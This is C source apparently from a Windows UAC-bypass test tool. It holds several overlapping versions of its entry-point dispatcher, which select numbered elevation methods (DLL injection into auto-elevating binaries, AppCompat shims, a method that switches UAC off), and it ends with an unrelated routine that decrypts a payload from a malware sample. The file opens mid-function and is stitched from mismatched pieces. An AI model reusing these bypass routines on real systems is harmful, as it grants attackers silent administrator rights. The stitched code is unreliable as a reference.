        goto Done;
    }
    if (ElevType != TokenElevationTypeLimited) {
        MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), PROGRAMTITLE, MB_ICONINFORMATION);
        goto Done;
    }

    IsWow64 = supIsProcess32bit(GetCurrentProcess());

    // Map the numeric method argument to a METHOD_* id.
    // The compares are sequential ifs rather than else-if; only one can match.
    dwType = 0;
    bytesIO = 0;
    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
        if (lstrcmpi(szBuffer, TEXT("1")) == 0) {
            OutputDebugString(TEXT("[UCM] Method Sysprep selected\n\r"));
            dwType = METHOD_SYSPREP;
        }
        if (lstrcmpi(szBuffer, TEXT("2")) == 0) {
            OutputDebugString(TEXT("[UCM] Method Sysprep_ex selected\n\r"));
            dwType = METHOD_SYSPREP_EX;
        }
        if (lstrcmpi(szBuffer, TEXT("3")) == 0) {
            OutputDebugString(TEXT("[UCM] Method Oobe selected\n\r"));
            dwType = METHOD_OOBE;
        }
#ifndef _WIN64
        if (lstrcmpi(szBuffer, TEXT("4")) == 0) {
            OutputDebugString(TEXT("[UCM] Method AppCompat selected\n\r"));
            dwType = METHOD_APPCOMPAT;
        }
#endif
        if (lstrcmpi(szBuffer, TEXT("5")) == 0) {
            OutputDebugString(TEXT("[UCM] Method Simda selected\n\r"));
            dwType = METHOD_SIMDA;
        }
        if (lstrcmpi(szBuffer, TEXT("6")) == 0) {
            OutputDebugString(TEXT("[UCM] Method Carberp selected\n\r"));
            dwType = METHOD_CARBERP;
        }
        if (lstrcmpi(szBuffer, TEXT("7")) == 0) {
            OutputDebugString(TEXT("[UCM] Method Carberp_ex selected\n\r"));
            dwType = METHOD_CARBERP_EX;
        }
    }

    // Sysprep_ex is Windows 8.1 (build 9600) specific.
    if ((dwType == METHOD_SYSPREP_EX) && (osver.dwBuildNumber < 9600)) {
        MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 8.1 use"), PROGRAMTITLE, MB_ICONINFORMATION);
        goto Done;
    }

    switch (dwType) {

    case METHOD_SYSPREP:
    case METHOD_SYSPREP_EX:
    case METHOD_OOBE:
        //
        // Since we are using injection and not using heavens gate, we should ban usage under wow64.
        // (The check is compiled out in _DEBUG builds.)
        //
#ifndef _DEBUG
        if (IsWow64) {
            MessageBoxW(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        if (ucmStandardAutoElevation(dwType, INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
        }
        break;

    //
    // There is no RedirectEXE for x64.
    //
#ifndef _WIN64
    case METHOD_APPCOMPAT:
        if (ucmAppcompatElevation()) {
            OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
        }
        break;
#endif

    case METHOD_SIMDA:
        //
        // Since we are using injection and not using heavens gate, we should ban usage under wow64.
        //
#ifndef _DEBUG
        if (IsWow64) {
            MessageBoxW(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        // Destructive: this method disables UAC system-wide, so confirm first.
        if (MessageBox(GetDesktopWindow(), TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."), PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) {
            if (ucmSimdaTurnOffUac()) {
                OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
            }
        }
        break;

    case METHOD_CARBERP:
    case METHOD_CARBERP_EX:
        if (dwType == METHOD_CARBERP) {
            // Plain Carberp variant: Windows 7 .. 8.1 only.
            if (osver.dwBuildNumber > 9600) {
                MessageBoxW(GetDesktopWindow(), TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            //there is no migmiz in syswow64 in 8+
            if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
                MessageBoxW(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
        }
        if (ucmWusaMethod(dwType, INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
        }
        break;
    }

Done:
    ExitProcess(0);
}
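/*
* ucmMain
*
* Purpose:
*
* Program entry point.
*
* Command line:
*   1: method number (parsed with strtoul) - required
*   2: optional parameter handed to the payload via supSetParameter
*      (for METHOD_REDIRECTEXE / METHOD_SHIMPATCH it is passed to
*      ucmAppcompatElevation directly instead)
*
* Flow: ucmInit, Windows 7+ check, limited-admin-token check, then a first
* switch that asks the user (ucmShowQuestion(UACFIX)) before running a
* method on a build where it is known to be fixed, and a second switch
* that dispatches to the ucm* implementation. Injection based methods
* refuse to run under WOW64 (check compiled out in _DEBUG builds).
*
* Return: ERROR_SUCCESS once the selected method has been attempted (the
* method's own result is only reported via OutputDebugString), or an
* ERROR_* code for an init/version/token/argument problem.
*
*/
UINT ucmMain()
{
    DWORD bytesIO, dwType, paramLen;
    WCHAR *p;
    WCHAR szBuffer[MAX_PATH + 1];
    TOKEN_ELEVATION_TYPE ElevType;

    if (ucmInit() != ERROR_SUCCESS) {
        return ERROR_INTERNAL_ERROR;
    }

    //query windows version
    if (!supIsWindowsVersionOrGreater(HIBYTE(_WIN32_WINNT_WIN7), LOBYTE(_WIN32_WINNT_WIN7), 0)) {
        ucmShowMessage(TEXT("This Windows is unsupported."));
        return ERROR_NOT_SUPPORTED;
    }

    // Methods only make sense from a limited admin token (UAC filtered).
    ElevType = TokenElevationTypeDefault;
    if (!supGetElevationType(&ElevType)) {
        return ERROR_INVALID_ACCESS;
    }
    if (ElevType != TokenElevationTypeLimited) {
        ucmShowMessage(TEXT("Admin account with limited token required."));
        return ERROR_NOT_SUPPORTED;
    }

    // Method number.
    dwType = 0;
    bytesIO = 0;
    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
    if (bytesIO == 0) {
        return ERROR_INVALID_DATA;
    }

    // NOTE(review): a number that matches no METHOD_* case passes both
    // switches untouched and the function returns ERROR_SUCCESS having done
    // nothing; a `default:` returning ERROR_INVALID_DATA would make that visible.
    dwType = strtoul(szBuffer);
    switch (dwType) {

    case METHOD_SYSPREP1://cryptbase
        if (g_ldp.osver.dwBuildNumber > 9200) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_SYSPREP2://shcore
        if (g_ldp.osver.dwBuildNumber != 9600) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_SYSPREP3://dbgcore
        if (g_ldp.osver.dwBuildNumber != 10240) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_OOBE://oobe service
        if (g_ldp.osver.dwBuildNumber >= 10548) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_REDIRECTEXE:
        if (g_ldp.osver.dwBuildNumber > 9600) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
#ifdef _WIN64
        ucmShowMessage(WOW64WIN32ONLY);
        return ERROR_UNSUPPORTED_TYPE;
#endif
        break;

    case METHOD_SIMDA:
        if (g_ldp.osver.dwBuildNumber >= 10136) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_CARBERP:
        if (g_ldp.osver.dwBuildNumber >= 10147) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_CARBERP_EX:
        if (g_ldp.osver.dwBuildNumber >= 10147) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_TILON:
        if (g_ldp.osver.dwBuildNumber > 9200) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_AVRF:
        if (g_ldp.osver.dwBuildNumber >= 10136) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_WINSAT:
        if (g_ldp.osver.dwBuildNumber >= 10548) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_SHIMPATCH:
        if (g_ldp.osver.dwBuildNumber > 9600) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
#ifdef _WIN64
        ucmShowMessage(WOW64WIN32ONLY);
        return ERROR_UNSUPPORTED_TYPE;
#endif
        break;

    case METHOD_MMC:
        break;

    case METHOD_H1N1:
        if (g_ldp.osver.dwBuildNumber >= 10548) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_GENERIC:
        break;
    }

    //prepare command for payload
    // (fixed: the address-of operator here had been mangled into a pilcrow,
    // "¶mLen", which does not compile)
    paramLen = 0;
    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
    GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &paramLen);
    if (paramLen > 0) {
        if (dwType != METHOD_REDIRECTEXE) {
            supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
        }
    }

    switch (dwType) {

    case METHOD_SYSPREP1:
    case METHOD_SYSPREP2:
    case METHOD_SYSPREP3:
    case METHOD_OOBE:
    case METHOD_TILON:
        //
        // Since we are using injection and not using heavens gate/syswow64, we should ban usage under wow64.
        //
#ifndef _DEBUG
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
        }
        break;

    //
    // Allow only in 32 version.
    //
#ifndef _WIN64
    case METHOD_REDIRECTEXE:
    case METHOD_SHIMPATCH:
        if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (paramLen != 0) ? szBuffer : NULL)) {
            OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
        }
        break;
#endif

    case METHOD_SIMDA:
        //
        // Since we are using injection and not using heavens gate, we should ban usage under wow64.
        //
#ifndef _DEBUG
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        // Destructive: this method disables UAC system-wide, so confirm first.
        if (MessageBox(GetDesktopWindow(), TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."), PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) {
            if (ucmSimdaTurnOffUac()) {
                OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
            }
        }
        break;

    case METHOD_CARBERP:
    case METHOD_CARBERP_EX:
        if (dwType == METHOD_CARBERP) {
            //there is no migmiz in syswow64 in 8+
            if ((g_ldp.IsWow64) && (g_ldp.osver.dwBuildNumber > 7601)) {
                ucmShowMessage(WOW64STRING);
                return ERROR_UNSUPPORTED_TYPE;
            }
        }
        if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
            if (g_ldp.IsWow64) {
                ucmShowMessage(WOW64STRING);
                return ERROR_UNSUPPORTED_TYPE;
            }
#endif
        }
        if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
        }
        break;

    case METHOD_AVRF:
#ifndef _DEBUG
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
            OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
        }
        break;

    case METHOD_WINSAT:
        //
        // Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
        //
        if (g_ldp.IsWow64) {
            ucmShowMessage(LAZYWOW64UNSUPPORTED);
            return ERROR_UNSUPPORTED_TYPE;
        }
        // Target DLL differs before/after Windows 8 (build 9200).
        if (g_ldp.osver.dwBuildNumber < 9200) {
            p = L"powrprof.dll";
        }
        else {
            p = L"devobj.dll";
        }
        if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (g_ldp.osver.dwBuildNumber <= 10136))) {
            OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
        }
        break;

    case METHOD_MMC:
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
        p = L"elsext.dll";
        if (ucmMMCMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] MMC method called\n\r"));
        }
        break;

    case METHOD_H1N1:
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
        if (ucmH1N1Method((CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] H1N1 method called\n\r"));
        }
        break;

    case METHOD_GENERIC:
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
        p = L"ntwdblib.dll";
        if (ucmGenericAutoelevation(
            METHOD_SQLSRV_TARGETAPP,
            p,
            (CONST PVOID)INJECTDLL,
            sizeof(INJECTDLL)))
        {
            OutputDebugString(TEXT("[UCM] Generic method called\n\r"));
        }
        break;
    }

    return ERROR_SUCCESS;
}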
/*
* main
*
* Purpose:
*
* Program entry point of the test tool.
*
* Flow, in order:
*   1. reject builds below 7000 (RtlGetVersion);
*   2. require the caller's token to be TokenElevationTypeLimited, i.e. an
*      admin account running with the filtered (non-elevated) token;
*   3. read the method number from command-line parameter 1 and apply the
*      per-method build-number / bitness gates;
*   4. dispatch to the selected ucm* method.
*
* Every outcome, including a failed gate, ends at the Done label, and the
* process always exits with code 0; the only success/failure signal is the
* OutputDebugString text, so a caller cannot tell from the exit code whether
* a method ran.
*
* NOTE(review): VOID main() is not a standard entry-point signature and
* strtoul() is called with a single argument below -- both presumably come
* from the project's own runtime/helper set rather than the CRT; confirm.
*/
VOID main()
{
    BOOL IsWow64 = FALSE;
    DWORD bytesIO, dwType;
    WCHAR *p;
    WCHAR szBuffer[MAX_PATH + 1];
    TOKEN_ELEVATION_TYPE ElevType;
    RTL_OSVERSIONINFOW osver;

    //verify system version
    RtlSecureZeroMemory(&osver, sizeof(osver));
    osver.dwOSVersionInfoSize = sizeof(osver);
    RtlGetVersion(&osver);
    if (osver.dwBuildNumber < 7000) {
        MessageBox(GetDesktopWindow(), TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
        goto Done;
    }

    // Elevation-type query failure is treated as "not applicable": no
    // message is shown, the tool just exits.
    ElevType = TokenElevationTypeDefault;
    if (!supGetElevationType(&ElevType)) {
        goto Done;
    }

    // Only a limited (filtered) admin token is accepted; a full token or a
    // standard user token is rejected with a message.
    if (ElevType != TokenElevationTypeLimited) {
        MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), PROGRAMTITLE, MB_ICONINFORMATION);
        goto Done;
    }

    // Used as the WOW64 indicator by the per-method gates below
    // (presumably "32-bit process on this OS"; supIsProcess32bit is external).
    IsWow64 = supIsProcess32bit(GetCurrentProcess());

    // Method number comes from command-line parameter 1; dwType stays 0
    // (which matches no case below) when the parameter is absent.
    dwType = 0;
    bytesIO = 0;
    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
        dwType = strtoul(szBuffer);

        // First pass: per-method version / bitness pre-checks. Each case
        // only logs and possibly bails out; the actual dispatch is the
        // second switch.
        switch (dwType) {
        case METHOD_SYSPREP:
            OutputDebugString(TEXT("[UCM] Sysprep\n\r"));
            // rejected on builds above 9200
            if (osver.dwBuildNumber > 9200) {
                MessageBox(GetDesktopWindow(), WINPREBLUE, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            break;
        case METHOD_SYSPREP_EX:
            OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));
            // rejected on builds below 9600
            if (osver.dwBuildNumber < 9600) {
                MessageBox(GetDesktopWindow(), WINBLUEONLY, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            break;
        case METHOD_OOBE:
            OutputDebugString(TEXT("[UCM] Oobe\n\r"));
            break;
        case METHOD_REDIRECTEXE:
            OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r"));
            // 32-bit build of the tool only; the 64-bit build has no case
            // for this method in the dispatch switch either.
#ifdef _WIN64
            MessageBox(GetDesktopWindow(), WOW64WIN32ONLY, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
#endif
            break;
        case METHOD_SIMDA:
            OutputDebugString(TEXT("[UCM] Simda\n\r"));
            break;
        case METHOD_CARBERP:
            OutputDebugString(TEXT("[UCM] Carberp\n\r"));
            break;
        case METHOD_CARBERP_EX:
            OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));
            break;
        case METHOD_TILON:
            OutputDebugString(TEXT("[UCM] Tilon\n\r"));
            // rejected on builds above 9200
            if (osver.dwBuildNumber > 9200) {
                MessageBox(GetDesktopWindow(), WINPREBLUE, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            break;
        case METHOD_AVRF:
            OutputDebugString(TEXT("[UCM] AVrf\n\r"));
            break;
        case METHOD_WINSAT:
            OutputDebugString(TEXT("[UCM] WinSAT\n\r"));
            break;
        case METHOD_SHIMPATCH:
            OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r"));
            // 32-bit build of the tool only (see METHOD_REDIRECTEXE).
#ifdef _WIN64
            MessageBox(GetDesktopWindow(), WOW64WIN32ONLY, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
#endif
            break;
        }
    }

    // Second pass: dispatch. Note that the WOW64 gates guarded by
    // #ifndef _DEBUG are compiled out in debug builds.
    switch (dwType) {
    case METHOD_SYSPREP:
    case METHOD_SYSPREP_EX:
    case METHOD_OOBE:
    case METHOD_TILON:
        //
        // Since we are using injection and not using heavens gate, we should ban usage under wow64.
        //
#ifndef _DEBUG
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
        }
        break;

        //
        // Allow only in 32 version.
        //
#ifndef _WIN64
    case METHOD_REDIRECTEXE:
    case METHOD_SHIMPATCH:
        if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
        }
        break;
#endif
    case METHOD_SIMDA:
        //
        // Since we are using injection and not using heavens gate, we should ban usage under wow64.
        //
#ifndef _DEBUG
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        // Destructive method: explicit Yes/No confirmation before it runs.
        if (MessageBox(GetDesktopWindow(), TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."), PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) {
            if (ucmSimdaTurnOffUac()) {
                OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
            }
        }
        break;
    case METHOD_CARBERP:
    case METHOD_CARBERP_EX:
        if (dwType == METHOD_CARBERP) {
            // rejected on builds above 9600
            if (osver.dwBuildNumber > 9600) {
                MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            //there is no migmiz in syswow64 in 8+
            if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
                MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
        }
        if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
            if (IsWow64) {
                MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
#endif
        }
        if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
        }
        break;
    case METHOD_AVRF:
#ifndef _DEBUG
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
            OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
        }
        break;
    case METHOD_WINSAT:
        //
        // Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
        //
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
        // Target module name is chosen by build number (below / at-or-above 9200).
        if (osver.dwBuildNumber < 9200) {
            p = L"powrprof.dll";
        }
        else {
            p = L"devobj.dll";
        }
        if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
        }
        break;
    }

Done:
    // Unconditional exit code 0 -- see the header comment.
    ExitProcess(0);
}
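/*
* SfDecryptPayload
*
* Purpose:
*
* Decrypt the payload stored as resource #2 of the PE image named by
* command-line parameter 1 and write the result to the file named by
* parameter 2 ("out.bin" when absent).
*
* Key derivation and cipher, as implemented here: the key is the MD5 of
* the image's IMAGE_FILE_HEADER, and the resource is RC4-decrypted with it
* (BCryptEncrypt is used because RC4 is a stream cipher, so the same
* keystream XOR performs decryption). This presumably mirrors how the
* analysed sample encrypted its payload; it is not a key scheme chosen by
* this tool. If the decrypted data unpacks as a cabinet via
* SfcabExtractMemory the extracted content is written, otherwise the raw
* decrypted data is written as-is.
*
* The input file is untrusted: it is mapped without execute rights and the
* PE headers are validated with RtlImageNtHeader before anything is read
* through them.
*
* Return: (UINT)-1 when no input file is given; 0 otherwise. A decryption
* or write failure is reported on the console (T_SFDECRYPTFAIL) but still
* returns 0 -- callers must not rely on the return value for that case.
*/
UINT SfDecryptPayload(
    LPWSTR lpParameter
    )
{
    BOOL cond = FALSE, bSuccess = FALSE;
    PBYTE cng_object, hashdata, decrypted, enc_data, extracted;
    ULONG obj_sz, rlen, hdatasz, enc_data_size;
    BCRYPT_ALG_HANDLE h_alg = NULL;
    BCRYPT_HASH_HANDLE h_hash = NULL;
    BCRYPT_KEY_HANDLE h_rc4key = NULL;
    NTSTATUS status;
    HANDLE pheap = NULL;
    PIMAGE_NT_HEADERS nthdr;
    PIMAGE_FILE_HEADER fheader;
    PVOID pdll = NULL;
    WCHAR InputFile[MAX_PATH + 1], OutputFile[MAX_PATH + 1];

    rlen = 0;
    RtlSecureZeroMemory(InputFile, sizeof(InputFile));
    // Zero the output name too so a partially written parameter is still
    // NUL-terminated (the original only zeroed InputFile).
    RtlSecureZeroMemory(OutputFile, sizeof(OutputFile));
    GetCommandLineParam(lpParameter, 1, InputFile, MAX_PATH, &rlen);
    if (rlen == 0) {
        SfcuiPrintText(g_ConOut, T_SFDECRYPTUSAGE, g_ConsoleOutput, FALSE);
        return (UINT)-1;
    }

    // Single-pass do/while: every failure "break"s to the common cleanup.
    do {
        rlen = 0;
        GetCommandLineParam(lpParameter, 2, OutputFile, MAX_PATH, &rlen);
        if (rlen == 0)
            _strcpy(OutputFile, TEXT("out.bin"));

        pdll = SfuCreateFileMappingNoExec(InputFile);
        if (pdll == NULL)
            break;

        // RtlImageNtHeader returns NULL for anything that is not a valid PE
        // image; the original dereferenced its result unconditionally, which
        // crashes on a malformed input file. Validate before touching
        // resources or headers.
        nthdr = RtlImageNtHeader(pdll);
        if (nthdr == NULL)
            break;
        fheader = &nthdr->FileHeader;

        // NOTE(review): enc_data / enc_data_size come from the mapped file;
        // SfuQueryResourceData is assumed to bound them to the mapping --
        // confirm. An empty resource is treated as failure.
        enc_data_size = 0;
        enc_data = SfuQueryResourceData(2, pdll, &enc_data_size);
        if ((enc_data == NULL) || (enc_data_size == 0))
            break;

        //
        // Phase 1: MD5(IMAGE_FILE_HEADER) -> hashdata (the RC4 key material).
        //
        status = BCryptOpenAlgorithmProvider(&h_alg, BCRYPT_MD5_ALGORITHM, NULL, 0);
        if (!NT_SUCCESS(status))
            break;

        obj_sz = 0;
        rlen = 0;
        status = BCryptGetProperty(h_alg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&obj_sz, sizeof(obj_sz), &rlen, 0);
        if (!NT_SUCCESS(status))
            break;

        hdatasz = 0;
        rlen = 0;
        status = BCryptGetProperty(h_alg, BCRYPT_HASH_LENGTH, (PUCHAR)&hdatasz, sizeof(hdatasz), &rlen, 0);
        if (!NT_SUCCESS(status))
            break;

        // Private heap: everything allocated below is released at once by
        // HeapDestroy in the cleanup path.
        pheap = HeapCreate(0, 0, 0);
        if (pheap == NULL)
            break;

        cng_object = HeapAlloc(pheap, HEAP_ZERO_MEMORY, obj_sz);
        if (cng_object == NULL)
            break;

        hashdata = HeapAlloc(pheap, HEAP_ZERO_MEMORY, hdatasz);
        if (hashdata == NULL)
            break;

        status = BCryptCreateHash(h_alg, &h_hash, cng_object, obj_sz, NULL, 0, 0);
        if (!NT_SUCCESS(status))
            break;

        status = BCryptHashData(h_hash, (PUCHAR)fheader, sizeof(IMAGE_FILE_HEADER), 0);
        if (!NT_SUCCESS(status))
            break;

        status = BCryptFinishHash(h_hash, hashdata, hdatasz, 0);
        if (!NT_SUCCESS(status))
            break;

        // Release the hash objects now; the handles are reused for RC4, so
        // they are reset to NULL so the cleanup path does not double-free.
        BCryptDestroyHash(h_hash);
        BCryptCloseAlgorithmProvider(h_alg, 0);
        HeapFree(pheap, 0, cng_object);
        h_alg = NULL;
        h_hash = NULL;

        //
        // Phase 2: RC4 with hashdata as the key, applied to the resource.
        //
        status = BCryptOpenAlgorithmProvider(&h_alg, BCRYPT_RC4_ALGORITHM, NULL, 0);
        if (!NT_SUCCESS(status))
            break;

        obj_sz = 0;
        rlen = 0;
        status = BCryptGetProperty(h_alg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&obj_sz, sizeof(obj_sz), &rlen, 0);
        if (!NT_SUCCESS(status))
            break;

        cng_object = HeapAlloc(pheap, HEAP_ZERO_MEMORY, obj_sz);
        if (cng_object == NULL)
            break;

        status = BCryptGenerateSymmetricKey(h_alg, &h_rc4key, cng_object, obj_sz, hashdata, hdatasz, 0);
        if (!NT_SUCCESS(status))
            break;

        decrypted = HeapAlloc(pheap, HEAP_ZERO_MEMORY, enc_data_size);
        if (decrypted == NULL)
            break;

        rlen = 0;
        status = BCryptEncrypt(h_rc4key, enc_data, enc_data_size, NULL, NULL, 0, decrypted, enc_data_size, &rlen, 0);
        if (!NT_SUCCESS(status))
            break;

        //
        // Phase 3: unpack if it is a cabinet, else write the raw decrypted data.
        //
        enc_data_size = rlen;
        rlen = 0;
        extracted = SfcabExtractMemory(decrypted, enc_data_size, &rlen);
        if (extracted) {
            if (SfuWriteBufferToFile(OutputFile, extracted, rlen, FALSE, FALSE) == rlen) {
                bSuccess = TRUE;
            }
            LocalFree(extracted);
        }
        else {
            //failed to extract, drop cab as is
            if (SfuWriteBufferToFile(OutputFile, decrypted, enc_data_size, FALSE, FALSE) == enc_data_size) {
                bSuccess = TRUE;
            }
        }

        if (bSuccess) {
            SfcuiPrintText(g_ConOut, T_SFDECRYPTED, g_ConsoleOutput, FALSE);
            SfcuiPrintText(g_ConOut, OutputFile, g_ConsoleOutput, FALSE);
        }

    } while (cond);

    if (bSuccess == FALSE) {
        SfcuiPrintText(g_ConOut, T_SFDECRYPTFAIL, g_ConsoleOutput, FALSE);
    }

    // Cleanup: handles are NULL unless the corresponding step succeeded.
    if (h_rc4key != NULL)
        BCryptDestroyKey(h_rc4key);

    if (h_hash != NULL)
        BCryptDestroyHash(h_hash);

    if (h_alg != NULL)
        BCryptCloseAlgorithmProvider(h_alg, 0);

    if (pheap != NULL)
        HeapDestroy(pheap);

    if (pdll != 0)
        NtUnmapViewOfSection(NtCurrentProcess(), (PVOID)pdll);

    return 0;
}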